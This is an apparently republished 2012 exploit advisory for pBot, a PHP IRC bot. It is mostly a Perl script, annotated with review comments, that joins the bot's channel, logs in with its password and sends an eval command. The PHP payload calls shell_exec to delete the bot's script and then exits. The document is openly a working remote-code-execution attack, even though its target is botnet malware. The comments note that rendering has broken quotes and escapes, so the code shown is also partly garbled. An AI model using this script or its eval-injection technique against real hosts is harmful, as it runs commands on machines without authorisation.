pBot Remote Code Execution Exploit

Summary

pBot (configured with ‘*’ hostauth) suffers from a remote code execution vulnerability

Credit:

The information has been provided by bwall.


Details

Vulnerable Systems:
 *pBot

use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;

# NOTE(review): as rendered, the listing uses typographic quotes and has lost
# backslash escapes (e.g. a bare "n" where a newline escape is expected), so
# it is not valid Perl in this form. The script also has no `use strict` /
# `use warnings`, and most of the state below is package-global.
#
# Identity the script presents to the IRC server.
my $nickname = ‘BotSlayer’;
my $ident = ‘BotSlayer’;
my $fullname = ‘BotSlayer’;
# IO::Select set polled by the main loop; sockets are added in conn().
$sel_client = IO::Select->new();

#configuration values from the bot source
$ircserver = ‘localhost’; #’server’
$ircserverpass = ”; #’pass’
my $ircport = ‘6667’; #’port’
#if ‘key’ is set, then add a space and the password to the chan name
my @channels = (‘#anonbxu’); #’chan’ and ‘chan2’
$botPass = ‘hello’; #’password’
$botTrigger = ‘.’; #’trigger’
#hostauth must be ‘*’
$loginCMD = ‘user’; #usually user or login

#payload – PHP code to run
#This version deletes the bots originating script, and dies
$phpEval = ‘shell_exec(‘rm -f ‘.$_SERVER[‘SCRIPT_NAME’]);exit();’;

# Number of channels still to be handled; tryQuit() decrements it once per
# JOIN and quits when it reaches zero.
$channelCount = scalar(@channels);

# Called from parse() on every JOIN line. Sends the bot's login command and
# then the eval command carrying $phpEval as ordinary PRIVMSGs to the channel
# (so both are visible in channel logs), then counts the channel as done.
# Note that parse() does not check whose JOIN triggered this.
sub onJoin
{
my $channel = shift;
# Drops the first character of the captured JOIN parameter — presumably the
# leading ':' of the channel argument; confirm against the regex in parse().
$channel = substr($channel, 1);
print ‘Joined $channeln’;
say($channel, $botTrigger.$loginCMD.’ $botPass’);
# Fixed delay between login and command; no check that the login succeeded.
sleep(1);
say($channel, $botTrigger.’eval @BallastSec ‘.$phpEval);
print ‘Payload deliveredn’;
tryQuit();
}

# Decrements the global $channelCount; once every configured channel has
# been handled, disconnects via quit(), which also exits the process.
sub tryQuit
{
$channelCount–;
if($channelCount == 0)
{
quit(‘whomp wha’);
}
}

# Writes one raw IRC line. With two arguments the first is the socket to
# write to; with one argument it writes to the global $IRC_cur_socket.
# The result of print is not checked, so a dead socket is not detected here.
sub sendraw
{
# $#_ == 1 means exactly two arguments were passed (the string ‘1’ is
# compared numerically, which works but is unconventional).
if ($#_ == ‘1’)
{
my $socket = $_[0];
print $socket ‘$_[1]n’;
}
else
{
print $IRC_cur_socket ‘$_[0]n’;
}
}

# Opens a plain TCP (no TLS) connection to the IRC server, registers the
# socket in the globals $IRC_cur_socket, $sel_client and %irc_servers, and
# sends the PASS/NICK/USER registration lines. Returns 1 when the connect
# fails; the caller in the main loop ignores the return value either way.
sub conn
{
# Lexical $mynick shadows the global $mynick used by parse() and the loop.
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
# On failure this returns early, so the defined() check below is always true.
my $IRC_socket = IO::Socket::INET->new(Proto=>’tcp’, PeerAddr=>’$ircserver_con’, PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket))
{
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
# Per-socket state, keyed by the stringified socket reference.
$irc_servers{$IRC_cur_socket}{‘host’} = ‘$ircserver_con’;
$irc_servers{$IRC_cur_socket}{‘port’} = ‘$ircport_con’;
$irc_servers{$IRC_cur_socket}{‘nick’} = $mynick;
$irc_servers{$IRC_cur_socket}{‘myip’} = $IRC_socket->sockhost;
# Numeric != against the empty string: a non-numeric password numifies
# to 0, so this does not test for a non-empty string as apparently intended.
if($ircserverpass != ”)
{
sendraw(‘PASS ‘.$ircserverpass);
}
sendraw(‘NICK ‘.$mynick);
sendraw(‘USER $ident ‘.$IRC_socket->sockhost.’ $ircserver_con :$fullname’);
sleep 1;
}
}

# Dispatches one line received from the server. Handles PING, JOIN (hands off
# to onJoin), PRIVMSG (only a VERSION reply is acted on), NICK changes of our
# own nick, and the 001 welcome numeric (records nick/server name and joins
# @channels). $mynick and %irc_servers are globals shared with the main loop.
# NOTE(review): several regexes below read as if backslash escapes were lost
# in rendering (e.g. "s+", "S+", "Q...E"); confirm against the original.
sub parse
{
my $servarg = shift;
# Echoes every received line to stdout.
print $servarg.’n’;
if ($servarg =~ /^PING :(.*)/)
{
sendraw(‘PONG :$1’);
}
# Any JOIN line matches here; the joining nick in $1 is not compared with
# $mynick, so other users' joins also reach onJoin().
elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) JOIN (.+)/)
{
my $channel = $4;
onJoin($channel);
}
elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) PRIVMSG (.+?) :(.+)/)
{
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
# Looks like a CTCP VERSION handler whose control-character delimiters
# did not survive rendering — confirm.
if ($args =~ /^01VERSION01$/)
{
notice(‘$pn’, ‘01VERSION BotSlayer by Ballast Security01’);
}
# Captures an addressed command but $natrix and $arg are never used.
if ($args =~ /^(Q$mynickE|!a)s+(.*)/ )
{
my $natrix = $1;
my $arg = $2;
}
}
elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?)s+NICKs+:(S+)/i)
{
# Track our own nick changes only.
if (lc($1) eq lc($mynick))
{
$mynick=$4;
$irc_servers{$IRC_cur_socket}{‘nick’} = $mynick;
}
}
# 001 = registration complete; the server may have altered our nick ($2).
elsif ($servarg =~ m/^:(.+?)s+001s+(S+)s/i)
{
$mynick = $2;
$irc_servers{$IRC_cur_socket}{‘nick’} = $mynick;
$irc_servers{$IRC_cur_socket}{‘nome’} = ‘$1’;
foreach(@channels)
{
sendraw(‘JOIN $_’);
}
}
}
# Main event loop: (re)connects until a server entry exists, then polls the
# select set and hands every received line to parse().
my $line_temp;
while(1)
{
# Retries conn() in a tight loop while nothing is registered; conn() only
# sleeps after a successful connect, so a refused connection spins.
while (!(keys(%irc_servers)))
{
conn($nickname, $ircserver, $ircport);
}
delete($irc_servers{”}) if (defined($irc_servers{”}));
# Zero timeout: when nothing is readable the outer loop spins without delay.
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready)
{
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{‘nick’};
$nread = sysread($fh, $msg, 4096);
# EOF: drop the socket. There is no `next`, so control still falls
# through to the split/parse below for this handle.
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/n/, $msg);
$msg =~ s/rn$//;
# $line_temp is only ever reset to the empty value below, so the
# partial-line carry-over this suggests never actually happens; a line
# split across two sysread() calls is parsed as two fragments.
for(my $c=0; $c<= $#lines; $c++)
{
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp=”;
$line =~ s/r$//;
parse(‘$line’);
}
}
}

# Sends a PRIVMSG to a target. Silently does nothing unless exactly two
# arguments (target, text) are given. The `say` feature is not enabled in
# this file (no `use feature`), so this user sub is what gets called.
sub say
{
return unless $#_ == 1;
sendraw(‘PRIVMSG $_[0] :$_[1]’);
}

# Sends a NOTICE to a target. Silently does nothing unless exactly two
# arguments (target, text) are given.
sub notice
{
return unless $#_ == 1;
sendraw(‘NOTICE $_[0] :$_[1]’);
}

# Sends a JOIN for the given channel. Not called anywhere in this listing;
# note that `join` is also a Perl builtin, so a plain join(...) call would
# resolve to the builtin rather than this sub.
sub join
{
sendraw(‘JOIN $_[0]’);
}

# Sends a PART for the given channel. Not called anywhere in this listing.
sub part
{
sendraw(‘PART $_[0]’);
}

# Sends QUIT with the given message and terminates the process. The socket
# is not closed explicitly; exit is called with no status.
sub quit
{
sendraw(‘QUIT :$_[0]’);
exit;
}

Disclosure Timeline:
Published: 2012-08-01

Categories: Exploits